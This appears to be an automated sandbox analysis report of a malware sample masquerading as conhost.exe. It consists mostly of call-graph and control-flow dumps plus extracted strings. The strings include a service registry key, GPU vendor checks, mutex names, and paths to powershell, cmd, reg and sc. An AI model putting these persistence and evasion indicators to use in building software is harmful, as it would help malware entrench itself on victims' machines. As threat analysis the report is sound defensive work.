_wcsnicmp 2348 140004670 2344->2348 2344->2359 2346->2326 2349 14000145e 2 API calls 2348->2349 2351 14000467c 2349->2351 2350 1400048b1 2352 14000145e 2 API calls 2350->2352 2355 14000145e 2 API calls 2351->2355 2352->2326 2353 140004516 _wcsnicmp 2353->2348 2353->2359 2354 140004b42 wcslen 2356 14000153f 2 API calls 2354->2356 2355->2328 2356->2370 2357 14000145e NtUnloadKey malloc 2357->2370 2358 14000456a _wcsnicmp 2358->2348 2358->2359 2359->2318 2359->2324 2359->2327 2359->2342 2359->2344 2359->2353 2359->2358 2360 140004337 wcsstr 2359->2360 2543 140001599 2359->2543 2556 1400015a8 2359->2556 2360->2348 2360->2359 2361 140004cb7 wcslen 2362 14000153f 2 API calls 2361->2362 2362->2370 2363 14000512d wcslen 2365 14000153f 2 API calls 2363->2365 2364 140004ec2 wcslen 2366 14000157b 2 API calls 2364->2366 2365->2370 2366->2370 2367 140004f45 memset 2367->2370 2368 140005d54 memcpy 2368->2370 2369 140004faf wcslen 2372 1400015a8 2 API calls 2369->2372 2370->2354 2370->2357 2370->2361 2370->2363 2370->2364 2370->2367 2370->2368 2370->2369 2373 140005017 _wcsnicmp 2370->2373 2374 140005a46 wcslen 2370->2374 2376 1400055ee memset 2370->2376 2377 1400057f0 memset 2370->2377 2378 14000565b memset 2370->2378 2379 14000585f wcscpy wcscat wcslen 2370->2379 2381 1400056b5 wcscpy wcscat wcslen 2370->2381 2384 14000599c 2370->2384 2385 1400027d0 11 API calls 2370->2385 2769 1400014d6 2370->2769 2814 140001521 2370->2814 2912 140001431 2370->2912 2372->2370 2373->2370 2375 1400015a8 2 API calls 2374->2375 2375->2370 2376->2370 2376->2377 2377->2370 2378->2370 2380 140001422 2 API calls 2379->2380 2380->2370 2843 140001422 2381->2843 2384->2259 2385->2370 2387 140001394 2 API calls 2386->2387 2388 14000154e 2387->2388 2389 140001394 2 API calls 2388->2389 2390 14000155d 2389->2390 2391 140001394 2 API calls 2390->2391 2392 14000156c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000157b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000158a 2395->2396 2397 140001394 2 API calls 2396->2397 2398 140001599 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400015a8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400015b7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400015c6 2403->2404 2405 140001394 2 API calls 2404->2405 2406 1400015d5 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400015e4 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400015f3 2409->2410 2410->2282 2411 140001503 2410->2411 2412 140001394 2 API calls 2411->2412 2413 14000150d 2412->2413 2414 140001394 2 API calls 2413->2414 2415 140001512 2414->2415 2416 140001394 2 API calls 2415->2416 2417 140001521 2416->2417 2418 140001394 2 API calls 2417->2418 2419 140001530 2418->2419 2420 140001394 2 API calls 2419->2420 2421 14000153f 2420->2421 2422 140001394 2 API calls 2421->2422 2423 14000154e 2422->2423 2424 140001394 2 API calls 2423->2424 2425 14000155d 2424->2425 2426 140001394 2 API calls 2425->2426 2427 14000156c 2426->2427 2428 140001394 2 API calls 2427->2428 2429 14000157b 2428->2429 2430 140001394 2 API calls 2429->2430 2431 14000158a 2430->2431 2432 140001394 2 API calls 2431->2432 2433 140001599 2432->2433 2434 140001394 2 API calls 2433->2434 2435 1400015a8 2434->2435 2436 140001394 2 API calls 2435->2436 2437 1400015b7 2436->2437 2438 140001394 2 API calls 2437->2438 2439 1400015c6 2438->2439 2440 140001394 2 API calls 2439->2440 2441 1400015d5 2440->2441 2442 140001394 2 API calls 2441->2442 2443 1400015e4 2442->2443 2444 140001394 2 API calls 2443->2444 2445 1400015f3 2444->2445 2445->2285 2446 14000156c 2445->2446 2447 140001394 2 API calls 2446->2447 2448 14000157b 2447->2448 2449 140001394 2 API calls 2448->2449 2450 14000158a 2449->2450 2451 140001394 2 API calls 2450->2451 2452 140001599 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015a8 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015b7 2455->2456 2457 140001394 2 API calls 2456->2457 2458 1400015c6 2457->2458 2459 140001394 2 API calls 2458->2459 2460 1400015d5 2459->2460 2461 140001394 2 API calls 2460->2461 2462 1400015e4 2461->2462 2463 140001394 2 API calls 2462->2463 2464 1400015f3 2463->2464 2464->2285 2465 14000145e 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000146d 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000147c 2468->2469 2470 140001394 2 API calls 2469->2470 2471 14000148b 2470->2471 2472 140001394 2 API calls 2471->2472 2473 14000149a 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400014a9 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400014b8 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400014c7 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400014d6 2480->2481 2482 1400014e5 2481->2482 2483 140001394 2 API calls 2481->2483 2484 140001394 2 API calls 2482->2484 2483->2482 2485 1400014ef 2484->2485 2486 1400014f4 2485->2486 2487 140001394 2 API calls 2485->2487 2488 140001394 2 API calls 2486->2488 2487->2486 2489 1400014fe 2488->2489 2490 140001503 2489->2490 2491 140001394 2 API calls 2489->2491 2492 140001394 2 API calls 2490->2492 2491->2490 2493 14000150d 2492->2493 2494 140001394 2 API calls 2493->2494 2495 140001512 2494->2495 2496 140001394 2 API calls 2495->2496 2497 140001521 2496->2497 2498 140001394 2 API calls 2497->2498 2499 140001530 2498->2499 2500 140001394 2 API calls 2499->2500 2501 14000153f 2500->2501 2502 140001394 2 API calls 2501->2502 2503 14000154e 2502->2503 2504 140001394 2 API calls 2503->2504 2505 14000155d 2504->2505 2506 140001394 2 API calls 2505->2506 2507 14000156c 2506->2507 2508 140001394 2 API calls 2507->2508 2509 14000157b 2508->2509 2510 140001394 2 API calls 2509->2510 2511 14000158a 2510->2511 2512 140001394 2 API calls 2511->2512 2513 140001599 2512->2513 2514 140001394 2 API calls 2513->2514 2515 1400015a8 2514->2515 2516 140001394 2 API calls 2515->2516 2517 1400015b7 2516->2517 2518 140001394 2 API calls 2517->2518 2519 1400015c6 2518->2519 2520 140001394 2 API calls 2519->2520 2521 1400015d5 2520->2521 2522 140001394 2 API calls 2521->2522 2523 1400015e4 2522->2523 2524 140001394 2 API calls 2523->2524 2525 1400015f3 2524->2525 2525->2285 2527 140001394 2 API calls 2526->2527 2528 14000158a 2527->2528 2529 140001394 2 API calls 2528->2529 2530 140001599 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015a8 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015b7 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400015c6 2535->2536 2537 140001394 2 API calls 2536->2537 2538 1400015d5 2537->2538 2539 140001394 2 API calls 2538->2539 2540 1400015e4 2539->2540 2541 140001394 2 API calls 2540->2541 2542 1400015f3 2541->2542 2542->2359 2544 140001394 2 API calls 2543->2544 2545 1400015a8 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015b7 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015c6 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015d5 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400015e4 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400015f3 2554->2555 2555->2359 2557 140001394 2 API calls 2556->2557 2558 1400015b7 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015c6 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015d5 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015e4 2563->2564 2565 140001394 2 API calls 2564->2565 2566 1400015f3 2565->2566 2566->2359 2568 140001394 2 API calls 2567->2568 2569 14000147c 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000148b 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000149a 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400014a9 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400014b8 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400014c7 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400014d6 2580->2581 2582 1400014e5 2581->2582 2583 140001394 2 API calls 2581->2583 2584 140001394 2 API calls 2582->2584 2583->2582 2585 1400014ef 2584->2585 2586 1400014f4 2585->2586 2587 140001394 2 API calls 2585->2587 2588 140001394 2 API calls 2586->2588 2587->2586 2589 1400014fe 2588->2589 2590 140001503 2589->2590 2591 140001394 2 API calls 2589->2591 2592 140001394 2 API calls 2590->2592 2591->2590 2593 14000150d 2592->2593 2594 140001394 2 API calls 2593->2594 2595 140001512 2594->2595 2596 140001394 2 API calls 2595->2596 2597 140001521 2596->2597 2598 140001394 2 API calls 2597->2598 2599 140001530 2598->2599 2600 140001394 2 API calls 2599->2600 2601 14000153f 2600->2601 2602 140001394 2 API calls 2601->2602 2603 14000154e 2602->2603 2604 140001394 2 API calls 2603->2604 2605 14000155d 2604->2605 2606 140001394 2 API calls 2605->2606 2607 14000156c 2606->2607 2608 140001394 2 API calls 2607->2608 2609 14000157b 2608->2609 2610 140001394 2 API calls 2609->2610 2611 14000158a 2610->2611 2612 140001394 2 API calls 2611->2612 2613 140001599 2612->2613 2614 140001394 2 API calls 2613->2614 2615 1400015a8 2614->2615 2616 140001394 2 API calls 2615->2616 2617 1400015b7 2616->2617 2618 140001394 2 API calls 2617->2618 2619 1400015c6 2618->2619 2620 140001394 2 API calls 2619->2620 2621 1400015d5 2620->2621 2622 140001394 2 API calls 2621->2622 2623 1400015e4 2622->2623 2624 140001394 2 API calls 2623->2624 2625 1400015f3 2624->2625 2625->2326 2626 140001530 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000153f 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000154e 2629->2630 2631 140001394 2 API calls 2630->2631 2632 14000155d 2631->2632 2633 140001394 2 API calls 2632->2633 2634 14000156c 2633->2634 2635 140001394 2 API calls 2634->2635 2636 14000157b 2635->2636 2637 140001394 2 API calls 2636->2637 2638 14000158a 2637->2638 2639 140001394 2 API calls 2638->2639 2640 140001599 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015a8 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015b7 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015c6 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015d5 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015e4 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015f3 2651->2652 2652->2331 2652->2332 2654 140001394 2 API calls 2653->2654 2655 1400014b8 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400014c7 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400014d6 2658->2659 2660 1400014e5 2659->2660 2661 140001394 2 API calls 2659->2661 2662 140001394 2 API calls 2660->2662 2661->2660 2663 1400014ef 2662->2663 2664 1400014f4 2663->2664 2665 140001394 2 API calls 2663->2665 2666 140001394 2 API calls 2664->2666 2665->2664 2667 1400014fe 2666->2667 2668 140001503 2667->2668 2669 140001394 2 API calls 2667->2669 2670 140001394 2 API calls 2668->2670 2669->2668 2671 14000150d 2670->2671 2672 140001394 2 API calls 2671->2672 2673 140001512 2672->2673 2674 140001394 2 API calls 2673->2674 2675 140001521 2674->2675 2676 140001394 2 API calls 2675->2676 2677 140001530 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000153f 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000154e 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000155d 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000156c 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000157b 2686->2687 2688 140001394 2 API calls 2687->2688 2689 14000158a 2688->2689 2690 140001394 2 API calls 2689->2690 2691 140001599 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015a8 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015b7 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015c6 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015d5 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015e4 2700->2701 2702 140001394 2 API calls 2701->2702 2703 1400015f3 2702->2703 2703->2341 2704 140001440 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000144f 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000145e 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000146d 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000147c 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000148b 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000149a 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014a9 2717->2718 2719 140001394 2 API calls 2718->2719 2720 1400014b8 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014c7 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014d6 2723->2724 2725 1400014e5 2724->2725 2726 140001394 2 API calls 2724->2726 2727 140001394 2 API calls 2725->2727 2726->2725 2728 1400014ef 2727->2728 2729 1400014f4 2728->2729 2730 140001394 2 API calls 2728->2730 2731 140001394 2 API calls 2729->2731 2730->2729 2732 1400014fe 2731->2732 2733 140001503 2732->2733 2734 140001394 2 API calls 2732->2734 2735 140001394 2 API calls 2733->2735 2734->2733 2736 14000150d 2735->2736 2737 140001394 2 API calls 2736->2737 2738 140001512 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001521 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001530 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000153f 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000154e 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000155d 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000156c 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000157b 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000158a 2753->2754 2755 140001394 2 API calls 2754->2755 2756 140001599 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015a8 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015b7 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015c6 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015d5 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015e4 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015f3 2767->2768 2768->2341 2768->2350 2770 1400014e5 2769->2770 2771 140001394 2 API calls 2769->2771 2772 140001394 2 API calls 2770->2772 2771->2770 2773 1400014ef 2772->2773 2774 1400014f4 2773->2774 2775 140001394 2 API calls 2773->2775 2776 140001394 2 API calls 2774->2776 2775->2774 2777 1400014fe 2776->2777 2778 140001503 2777->2778 2779 140001394 2 API calls 2777->2779 2780 140001394 2 API calls 2778->2780 2779->2778 2781 14000150d 2780->2781 2782 140001394 2 API calls 2781->2782 2783 140001512 2782->2783 2784 140001394 2 API calls 2783->2784 2785 140001521 2784->2785 2786 140001394 2 API calls 2785->2786 2787 140001530 2786->2787 2788 140001394 2 API calls 2787->2788 2789 14000153f 2788->2789 2790 140001394 2 API calls 2789->2790 2791 14000154e 2790->2791 2792 140001394 2 API calls 2791->2792 2793 14000155d 2792->2793 2794 140001394 2 API calls 2793->2794 2795 14000156c 2794->2795 2796 140001394 2 API calls 2795->2796 2797 14000157b 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000158a 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001599 2800->2801 2802 140001394 2 API calls 2801->2802 2803 1400015a8 2802->2803 2804 140001394 2 API calls 2803->2804 2805 1400015b7 2804->2805 2806 140001394 2 API calls 2805->2806 2807 1400015c6 2806->2807 2808 140001394 2 API calls 2807->2808 2809 1400015d5 2808->2809 2810 140001394 2 API calls 2809->2810 2811 1400015e4 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015f3 2812->2813 2813->2370 2815 140001394 2 API calls 2814->2815 2816 140001530 2815->2816 2817 140001394 2 API calls 2816->2817 2818 14000153f 2817->2818 2819 140001394 2 API calls 2818->2819 2820 14000154e 2819->2820 2821 140001394 2 API calls 2820->2821 2822 14000155d 2821->2822 2823 140001394 2 API calls 2822->2823 2824 14000156c 2823->2824 2825 140001394 2 API calls 2824->2825 2826 14000157b 2825->2826 2827 140001394 2 API calls 2826->2827 2828 14000158a 2827->2828 2829 140001394 2 API calls 2828->2829 2830 140001599 2829->2830 2831 140001394 2 API calls 2830->2831 2832 1400015a8 2831->2832 2833 140001394 2 API calls 2832->2833 2834 1400015b7 2833->2834 2835 140001394 2 API calls 2834->2835 2836 1400015c6 2835->2836 2837 140001394 2 API calls 2836->2837 2838 1400015d5 2837->2838 2839 140001394 2 API calls 2838->2839 2840 1400015e4 2839->2840 2841 140001394 2 API calls 2840->2841 2842 1400015f3 2841->2842 2842->2370 2844 140001394 2 API calls 2843->2844 2845 140001431 2844->2845 2846 140001394 2 API calls 2845->2846 2847 140001440 2846->2847 2848 140001394 2 API calls 2847->2848 2849 14000144f 2848->2849 2850 140001394 2 API calls 2849->2850 2851 14000145e 2850->2851 2852 140001394 2 API calls 2851->2852 2853 14000146d 2852->2853 2854 140001394 2 API calls 2853->2854 2855 14000147c 2854->2855 2856 140001394 2 API calls 2855->2856 2857 14000148b 2856->2857 2858 140001394 2 API calls 2857->2858 2859 14000149a 2858->2859 2860 140001394 2 API calls 2859->2860 2861 1400014a9 2860->2861 2862 140001394 2 API calls 2861->2862 2863 1400014b8 2862->2863 2864 140001394 2 API calls 2863->2864 2865 1400014c7 2864->2865 2866 140001394 2 API calls 2865->2866 2867 1400014d6 2866->2867 2868 1400014e5 2867->2868 2869 140001394 2 API calls 2867->2869 2870 140001394 2 API calls 2868->2870 2869->2868 2871 1400014ef 2870->2871 2872 1400014f4 2871->2872 2873 140001394 2 API calls 2871->2873 2874 140001394 2 API calls 2872->2874 2873->2872 2875 1400014fe 2874->2875 2876 140001503 2875->2876 2877 140001394 2 API calls 2875->2877 2878 140001394 2 API calls 2876->2878 2877->2876 2879 14000150d 2878->2879 2880 140001394 2 API calls 2879->2880 2881 140001512 2880->2881 2882 140001394 2 API calls 2881->2882 2883 140001521 2882->2883 2884 140001394 2 API calls 2883->2884 2885 140001530 2884->2885 2886 140001394 2 API calls 2885->2886 2887 14000153f 2886->2887 2888 140001394 2 API calls 2887->2888 2889 14000154e 2888->2889 2890 140001394 2 API calls 2889->2890 2891 14000155d 2890->2891 2892 140001394 2 API calls 2891->2892 2893 14000156c 2892->2893 2894 140001394 2 API calls 2893->2894 2895 14000157b 2894->2895 2896 140001394 2 API calls 2895->2896 2897 14000158a 2896->2897 2898 140001394 2 API calls 2897->2898 2899 140001599 2898->2899 2900 140001394 2 API calls 2899->2900 2901 1400015a8 2900->2901 2902 140001394 2 API calls 2901->2902 2903 1400015b7 2902->2903 2904 140001394 2 API calls 2903->2904 2905 1400015c6 2904->2905 2906 140001394 2 API calls 2905->2906 2907 1400015d5 2906->2907 2908 140001394 2 API calls 2907->2908 2909 1400015e4 2908->2909 2910 140001394 2 API calls 2909->2910 2911 1400015f3 2910->2911 2911->2370 2913 140001394 2 API calls 2912->2913 2914 140001440 2913->2914 2915 140001394 2 API calls 2914->2915 2916 14000144f 2915->2916 2917 140001394 2 API calls 2916->2917 2918 14000145e 2917->2918 2919 140001394 2 API calls 2918->2919 2920 14000146d 2919->2920 2921 140001394 2 API calls 2920->2921 2922 14000147c 2921->2922 2923 140001394 2 API calls 2922->2923 2924 14000148b 2923->2924 2925 140001394 2 API calls 2924->2925 2926 14000149a 2925->2926 2927 140001394 2 API calls 2926->2927 2928 1400014a9 2927->2928 2929 140001394 2 API calls 2928->2929 2930 1400014b8 2929->2930 2931 140001394 2 API calls 2930->2931 2932 1400014c7 2931->2932 2933 140001394 2 API calls 2932->2933 2934 1400014d6 2933->2934 2935 1400014e5 2934->2935 2936 140001394 2 API calls 2934->2936 2937 140001394 2 API calls 2935->2937 2936->2935 2938 1400014ef 2937->2938 2939 1400014f4 2938->2939 2940 140001394 2 API calls 2938->2940 2941 140001394 2 API calls 2939->2941 2940->2939 2942 1400014fe 2941->2942 2943 140001503 2942->2943 2944 140001394 2 API calls 2942->2944 2945 140001394 2 API calls 2943->2945 2944->2943 2946 14000150d 2945->2946 2947 140001394 2 API calls 2946->2947 2948 140001512 2947->2948 2949 140001394 2 API calls 2948->2949 2950 140001521 2949->2950 2951 140001394 2 API calls 2950->2951 2952 140001530 2951->2952 2953 140001394 2 API calls 2952->2953 2954 14000153f 2953->2954 2955 140001394 2 API calls 2954->2955 2956 14000154e 2955->2956 2957 140001394 2 API calls 2956->2957 2958 14000155d 2957->2958 2959 140001394 2 API calls 2958->2959 2960 14000156c 2959->2960 2961 140001394 2 API calls 2960->2961 2962 14000157b 2961->2962 2963 140001394 2 API calls 2962->2963 2964 14000158a 2963->2964 2965 140001394 2 API calls 2964->2965 2966 140001599 2965->2966 2967 140001394 2 API calls 2966->2967 2968 1400015a8 2967->2968 2969 140001394 2 API calls 2968->2969 2970 1400015b7 2969->2970 2971 140001394 2 API calls 2970->2971 2972 1400015c6 2971->2972 2973 140001394 2 API calls 2972->2973 2974 1400015d5 2973->2974 2975 140001394 2 API calls 2974->2975 2976 1400015e4 2975->2976 2977 140001394 2 API calls 2976->2977 2978 1400015f3 2977->2978 2978->2370

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00000001400062E1 1 Function_00000001400060E1 2 Function_00000001400031E1 3 Function_00000001400026E1 4 Function_0000000140001AE4 33 Function_0000000140001D40 4->33 78 Function_0000000140001BA0 4->78 5 Function_00000001400014E5 73 Function_0000000140001394 5->73 6 Function_0000000140002FF0 58 Function_0000000140001370 6->58 7 Function_00000001400010F0 8 Function_00000001400061F1 9 Function_00000001400014F4 9->73 10 Function_0000000140001800 68 Function_0000000140002290 10->68 11 Function_0000000140006200 12 Function_0000000140003200 13 Function_0000000140002500 14 Function_0000000140001E00 15 Function_0000000140001000 15->14 40 Function_0000000140001750 15->40 86 Function_0000000140001FB0 15->86 93 Function_0000000140001FC0 15->93 16 Function_0000000140006101 17 Function_0000000140001503 17->73 18 Function_0000000140001404 18->73 19 Function_0000000140002104 20 Function_0000000140001E10 21 Function_0000000140001512 21->73 22 Function_0000000140003220 23 Function_0000000140002320 24 Function_0000000140002420 25 Function_0000000140001521 25->73 26 Function_0000000140006321 27 Function_0000000140006221 28 Function_0000000140006121 29 Function_0000000140001422 29->73 30 Function_0000000140001530 30->73 31 Function_0000000140001431 31->73 32 Function_000000014000153F 32->73 33->68 34 Function_0000000140001440 34->73 35 Function_0000000140001140 49 Function_0000000140001160 35->49 36 Function_0000000140003240 36->6 36->17 36->25 36->29 36->30 36->31 36->32 36->34 46 Function_000000014000145E 36->46 47 Function_0000000140002660 36->47 54 Function_000000014000156C 36->54 55 Function_000000014000146D 36->55 36->58 62 Function_000000014000157B 36->62 75 Function_0000000140001599 36->75 77 Function_00000001400063A0 36->77 82 Function_00000001400015A8 36->82 83 Function_00000001400014A9 36->83 94 Function_00000001400016C0 36->94 99 Function_00000001400027D0 36->99 105 Function_00000001400014D6 36->105 37 Function_0000000140006141 38 Function_0000000140003141 39 Function_0000000140001F47 57 Function_0000000140001870 39->57 41 Function_0000000140001650 42 Function_0000000140002050 43 Function_0000000140002751 44 Function_0000000140006251 45 Function_000000014000155D 45->73 46->73 48 Function_0000000140006660 48->77 49->36 49->49 49->57 63 Function_0000000140001880 49->63 67 Function_0000000140001F90 49->67 49->94 50 Function_0000000140001760 106 Function_00000001400020E0 50->106 51 Function_0000000140002460 52 Function_0000000140003160 53 Function_0000000140001E65 53->57 54->73 55->73 56 Function_000000014000216F 59 Function_0000000140001A70 59->33 59->78 60 Function_0000000140002770 61 Function_0000000140006171 62->73 63->24 63->33 63->47 63->78 64 Function_0000000140003180 65 Function_0000000140006380 66 Function_0000000140006281 69 Function_0000000140002590 70 Function_0000000140002790 71 Function_0000000140002691 72 Function_0000000140006191 73->48 84 Function_00000001400063B0 73->84 74 Function_0000000140002194 74->57 75->73 76 Function_000000014000219E 78->33 85 Function_00000001400023B0 78->85 98 Function_00000001400024D0 78->98 79 Function_0000000140001FA0 80 Function_00000001400027A0 81 Function_00000001400031A1 82->73 83->73 84->77 87 Function_00000001400022B0 88 Function_00000001400026B0 89 Function_00000001400027B1 90 Function_00000001400060B1 91 Function_00000001400061B1 92 Function_0000000140001AB3 92->33 92->78 95 Function_00000001400062C1 96 Function_0000000140001AC3 96->33 96->78 97 Function_00000001400014C7 97->73 99->5 99->9 99->17 99->21 99->45 99->46 99->47 99->58 99->77 99->83 99->97 100 Function_00000001400017D0 101 Function_0000000140001FD0 102 Function_00000001400026D0 103 Function_00000001400061D1 104 Function_0000000140001AD4 104->33 104->78 105->73 107 Function_00000001400017E0 107->106 108 Function_00000001400022E0

                                          Control-flow Graph

                                          APIs
                                          • NtUnloadKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Unload
                                          • String ID:
                                          • API String ID: 3485584074-0
                                          • Opcode ID: a72d98a719c8cdaad73ad0557a464b82bd852b70f1cd33c2fc3a5cd8b9bc82ba
                                          • Instruction ID: 5d147c68d4ad14f8a5c4a1d44db072cb208eafbc9f6289aa314c3b2696b16c71
                                          • Opcode Fuzzy Hash: a72d98a719c8cdaad73ad0557a464b82bd852b70f1cd33c2fc3a5cd8b9bc82ba
                                          • Instruction Fuzzy Hash: DFF0AFB2608B408AEA16DF62F85179A77A1F38C7C0F009929BBC853735DB3CC190CB80
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                          • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\igsximesqwgdyusfqsjiukmv$\BaseNamedObjects\kmkjujefwoxoesbh$\BaseNamedObjects\swzvqfqpxzakntu$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\CWRWVXLO$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe$\uyrlkcqvoccj\gtgpwwjkduow.exe
                                          • API String ID: 3506639089-79884341
                                          • Opcode ID: c9a98a3d4d624eb3a2c7ef34ed9883562e19393c0ed76858cbcf88b791a5986e
                                          • Instruction ID: 22ccd525e5f47582a50ff45422e8645663744e81655e24de493a30e2323665ca
                                          • Opcode Fuzzy Hash: c9a98a3d4d624eb3a2c7ef34ed9883562e19393c0ed76858cbcf88b791a5986e
                                          • Instruction Fuzzy Hash: B64339F1924AC198F723CF3AB8457E563A0BB9D3C8F445216FB84676B2EB794285C305

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 380 1400027d0-14000282b call 140002660 memset 383 140002831-14000283b 380->383 384 1400028fe-14000294e call 14000155d 380->384 386 140002864-14000286a 383->386 389 140002a43-140002a6b call 1400014c7 384->389 390 140002954-140002963 384->390 386->384 388 140002870-140002877 386->388 391 140002879-140002882 388->391 392 140002840-140002842 388->392 407 140002a76-140002ab8 call 140001503 call 1400063a0 memset 389->407 408 140002a6d 389->408 393 140002fa7-140002fe4 call 140001370 390->393 394 140002969-140002978 390->394 397 140002884-14000289b 391->397 398 1400028e8-1400028eb 391->398 395 14000284a-14000285e 392->395 399 1400029d4-140002a3e wcsncmp call 1400014e5 394->399 400 14000297a-1400029cd 394->400 395->384 395->386 403 1400028e5 397->403 404 14000289d-1400028b2 397->404 398->395 399->389 400->399 403->398 409 1400028c0-1400028c7 404->409 416 140002f39-140002f74 call 140001370 407->416 417 140002abe-140002ac5 407->417 408->407 410 1400028c9-1400028e3 409->410 411 1400028f0-1400028f9 409->411 410->403 410->409 411->395 420 140002ac7-140002afc 416->420 424 140002f7a 416->424 419 140002b03-140002b33 wcscpy wcscat wcslen 417->419 417->420 422 140002b35-140002b66 wcslen 